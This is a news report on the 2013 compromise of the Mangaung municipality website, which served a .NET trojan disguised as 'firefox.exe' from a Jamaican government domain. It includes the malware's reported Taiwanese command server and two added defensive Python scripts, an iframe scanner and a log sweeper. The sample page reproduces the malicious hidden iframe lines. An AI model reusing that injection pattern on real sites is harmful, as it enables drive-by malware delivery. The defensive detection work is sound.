Mangaung website hacked, serving malware from Jamaica

The website for the Mangaung municipality (mangaung.co.za, bloemfontein.co.za) is serving malware hosted on the website of the Jamaica Cultural Development Commission (jcdc.gov.jm).

At the time of writing, more than a day after informing both the State Information Technology Agency (SITA) and the JCDC, a Windows executable is automatically downloaded to your computer when you visit the website of the Mangaung municipality.

Interestingly, visiting the JCDC website itself did not trigger the file download.

The executable is called “firefox.exe” and it was embedded in the Mangaung website using a simple HTML <iframe> tag pointing to http://www.jcdc.gov.jm/uploads/firefox.exe.

The source of the Mangaung website also contained a second iframe pointing to a firefox.exe file hosted on shell32.tk, but that file appeared to be inaccessible.
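The injection described above is easy to spot once you know what to look for: an iframe (or frame, embed or object tag) whose source ends in an executable extension, usually on a third-party host and often sized to zero or hidden. The scanner below is an added example, not code from the article, from Sensepost or from Citizen Lab. The sample page is constructed to mirror the Mangaung injection; the jcdc.gov.jm URL is the one the article reports, while the shell32.tk path is an assumption, since the article gives only the host.

```python
"""Flag HTML that embeds an executable via <iframe>/<frame>/<embed>/<object>.

Added example (not the article's or Sensepost's code). The sample page is
constructed; the shell32.tk path is assumed, the jcdc.gov.jm URL is as reported.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Extensions a browser will offer for download rather than render.
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".com", ".pif", ".msi", ".bat", ".cmd", ".hta")
EMBED_TAGS = {"iframe", "frame", "embed", "object"}


class ExecutableEmbedScanner(HTMLParser):
    """Collect embed tags whose source resolves to an executable file."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in EMBED_TAGS:
            return
        attr = {k.lower(): (v or "") for k, v in attrs}
        src = attr.get("src") or attr.get("data")  # <object> uses data=
        if not src:
            return
        parsed = urlparse(src.strip())
        host = (parsed.netloc or self.page_host).lower()
        if not parsed.path.lower().endswith(EXECUTABLE_SUFFIXES):
            return
        # Hidden frames are the classic drive-by pattern: zero size or display:none.
        style = attr.get("style", "").replace(" ", "").lower()
        hidden = (attr.get("width") in ("0", "1") or attr.get("height") in ("0", "1")
                  or "display:none" in style or "visibility:hidden" in style)
        self.findings.append({
            "tag": tag,
            "src": src,
            "host": host,
            "off_domain": host != self.page_host,
            "hidden": hidden,
        })


def scan_html(html, page_host):
    """Return a list of findings for executable embeds in `html`."""
    scanner = ExecutableEmbedScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page (not the real Mangaung source).
SAMPLE_PAGE = """
<html><body>
<h1>Mangaung Metropolitan Municipality</h1>
<script src="http://www.mangaung.co.za/js/site.js"></script>
<iframe src="http://www.jcdc.gov.jm/uploads/firefox.exe" width="0" height="0"></iframe>
<iframe src="http://shell32.tk/firefox.exe" style="display: none"></iframe>
<iframe src="/news/latest.html"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE, "www.mangaung.co.za"):
        print(finding)
```

Run it against a saved copy of the page (curl the site from a sandbox, never a desktop browser) rather than the live HTML in a browser, since loading the page is exactly what triggers the download. The check keys on the file extension of the embed target rather than on the host, because the hosting site here was itself a legitimate, compromised government domain.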

Mangaung firefox.exe malware download prompt

Masquerading as Firefox? Smells like FinSpy

A report recently released by Citizen Lab revealed that the FinFisher spyware suite, which is sold to governments, sometimes had its trojan (FinSpy) masquerade as Firefox.

Add to this that Citizen Lab reported that it had discovered command & control servers for the spyware suite on the Telkom network in South Africa, and a logical first reaction is to suspect that a version of the FinSpy trojan was being hosted on the Mangaung website.

However, Citizen Lab’s report suggests that FinSpy would use far less overt methods of infecting a machine.

An investigation by Citizen Lab, which was later confirmed by Sensepost, indicated that the malware was not FinFisher.

Taiwanese spyware?

A quick check on VirusTotal did not provide conclusive results as to what this malware might be, but further analysis by Sensepost revealed that the trojan was written in .NET.

Jeremy du Bruyn, a security expert at Sensepost, explained that the trojan's code had been obfuscated, making it more difficult to determine its purpose.

“It employs a number of measures to make static analysis of the malware more difficult, for instance by calling ‘IsDebuggerPresent’ to check if it is being analysed and if so exit; as well as not using any hardcoded strings,” Du Bruyn said.

The trojan's developer appears to be Chinese-speaking, Du Bruyn said, which, he said, correlates with the Taiwanese IP address of the command & control server.

“The Trojan communicates with an IP in Taiwan, specifically 114.34.216.71 on port 888,” Du Bruyn said.
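For anyone defending a network whose users may have visited the Mangaung site, the two indicators the article gives (the dropper URL on jcdc.gov.jm and the command & control endpoint 114.34.216.71:888) are enough for a retrospective sweep of proxy and firewall logs. The script below is an added example, not code from the article or from Sensepost. The key=value log format and every log line are constructed for the example; the 10.1.4.x, 203.0.113.x and 198.51.100.x addresses are placeholders, and only the C2 endpoint and dropper URL come from the article.

```python
"""Sweep key=value proxy/firewall logs for the indicators reported in the article.

Added example (not the article's or Sensepost's code). Log format and lines are
constructed; only the C2 endpoint and dropper URL are the article's indicators.
"""
import re
from collections import defaultdict

C2_ENDPOINTS = {("114.34.216.71", 888)}                       # from the article
DROPPER_URLS = {"http://www.jcdc.gov.jm/uploads/firefox.exe"}  # from the article

# key=value tokens; values may be quoted to allow spaces.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_kv(line):
    """Parse one key=value log line into a dict (quotes stripped)."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def split_endpoint(value):
    """'1.2.3.4:888' -> ('1.2.3.4', 888); port is None if absent."""
    host, sep, port = value.rpartition(":")
    if not sep or not port.isdigit():
        return value, None
    return host, int(port)


def sweep(lines):
    """Return {source host: [(line_no, kind, indicator), ...]} for every hit."""
    hits = defaultdict(list)
    for n, line in enumerate(lines, 1):
        rec = parse_kv(line)
        src = split_endpoint(rec.get("src", "?"))[0]
        # Firewall side: any session to the C2 endpoint, allowed or denied.
        if "dst" in rec and split_endpoint(rec["dst"]) in C2_ENDPOINTS:
            hits[src].append((n, "c2-beacon", rec["dst"]))
        # Proxy side: a fetch of the dropper itself.
        url = rec.get("url", "").lower()
        if url in DROPPER_URLS:
            hits[src].append((n, "dropper-download", url))
    return dict(hits)


def infection_order(hits):
    """Sources that fetched the dropper and then beaconed: the strongest signal."""
    confirmed = []
    for src, events in hits.items():
        kinds = [kind for _, kind, _ in sorted(events)]
        if "dropper-download" in kinds:
            after = kinds[kinds.index("dropper-download"):]
            if "c2-beacon" in after:
                confirmed.append(src)
    return sorted(confirmed)


# Constructed sample log (placeholder addresses; format invented for the example).
SAMPLE_LOG = """\
2013-05-30T09:12:03Z type=proxy src=10.1.4.22:51233 dst=203.0.113.10:80 url="http://www.mangaung.co.za/" status=200
2013-05-30T09:12:04Z type=proxy src=10.1.4.22:51234 dst=198.51.100.7:80 url="http://www.jcdc.gov.jm/uploads/firefox.exe" status=200
2013-05-30T09:13:40Z type=fw src=10.1.4.22:51301 dst=114.34.216.71:888 proto=tcp action=allow
2013-05-30T09:20:11Z type=fw src=10.1.4.57:60120 dst=114.34.216.71:888 proto=tcp action=deny
2013-05-30T09:21:00Z type=proxy src=10.1.4.90:40010 dst=198.51.100.7:80 url="http://www.jcdc.gov.jm/" status=200
""".splitlines()

if __name__ == "__main__":
    found = sweep(SAMPLE_LOG)
    for host, events in found.items():
        print(host, events)
    print("download then beacon:", infection_order(found))
```

A denied session to the C2 endpoint is still worth a look: the host tried to beacon, which means the dropper most likely ran. The sweep matches on the exact URL, so a host that only browsed jcdc.gov.jm (as the article notes, the JCDC site itself did not trigger the download) is not flagged.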

Jeremy du Bruyn from Sensepost

Malware still being served

At the time of publication the Mangaung website was still serving the malware, despite SITA and the JCDC being alerted to it on Thursday, 30 May 2013.

While the JCDC had not responded by the time of publication, a SITA spokesperson did tell MyBroadband that SITA does not provide the hosting for this particular government website.

Thanks to Siavosh, Jeremy, and Dominic of Sensepost for their work in analysing the malware. Thanks to John and the team from Citizen Lab who also provided valuable information for this article.

Phummy